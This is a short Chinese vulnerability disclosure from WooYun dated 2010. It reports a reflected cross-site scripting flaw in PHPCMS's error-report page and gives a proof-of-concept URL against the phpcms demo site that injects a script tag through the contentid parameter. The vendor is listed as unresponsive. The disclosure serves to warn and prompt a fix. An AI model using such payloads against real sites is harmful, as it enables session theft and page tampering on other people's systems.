PHPCMS通杀XSS

相关厂商: phpcms

漏洞作者: only_guest

提交时间: 2010-08-24

公开时间: 2010-08-24

漏洞类型: 跨站脚本攻击

危害等级: 低

漏洞状态: 未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org


漏洞详情

简要描述:

在我要报错功能页下,过滤不严格.

详细说明:

在我要报错功能页下,过滤不严格.
http://demo.phpcms.cn/error_report/error_report.php?title=1&contentid=1"><script>alert(/xss/)</script>

漏洞证明:

http://demo.phpcms.cn/error_report/error_report.php?title=1&contentid=1"><script>alert(/xss/)</script>

修复方案:

加强过滤


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

发表评论?

0 条评论。

发表评论